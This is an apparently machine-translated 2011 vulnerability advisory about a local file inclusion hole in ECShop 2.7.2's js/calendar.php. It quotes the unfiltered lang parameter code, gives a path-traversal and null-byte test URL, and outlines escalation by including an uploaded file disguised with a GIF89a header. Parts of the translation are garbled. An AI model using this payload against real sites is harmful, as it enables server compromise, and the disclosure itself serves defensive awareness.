Ecshop the latest version v. 2 7 2 Local include vulnerability Oday-vulnerability warning-the black bar safety net

ID MYHACK58:62201131409
Type myhack58
Reporter 佚名
Modified 2011-08-01T00:00:00


“js/calendar.php”: the $lang = (! empty($_GET['lang'])) ? trim($_GET['lang']) : 'EN';//no filter, obviously contains a vulnerability if (! file_exists('../languages/' . $lang . '/calendar.php')) { $lang = 'EN'; } require(dirname(dirname(FILE)) . '/data/config.php'); header('Content-type: application/x-javascript; charset=' . EC_CHARSET); the include_once('../languages/' . $lang . '/calendar.php');//included here, and need to be truncated Test code: //Need magic_quotes_gpc = Off

/js/calendar. php? lang=../index. php%0 0. Note the back has a“.”) Use: 1, registered user

2, and then upload the GIF89a header of the GIF file cheat,

3, and then included, such as:%0 0. Note the back has a“.”)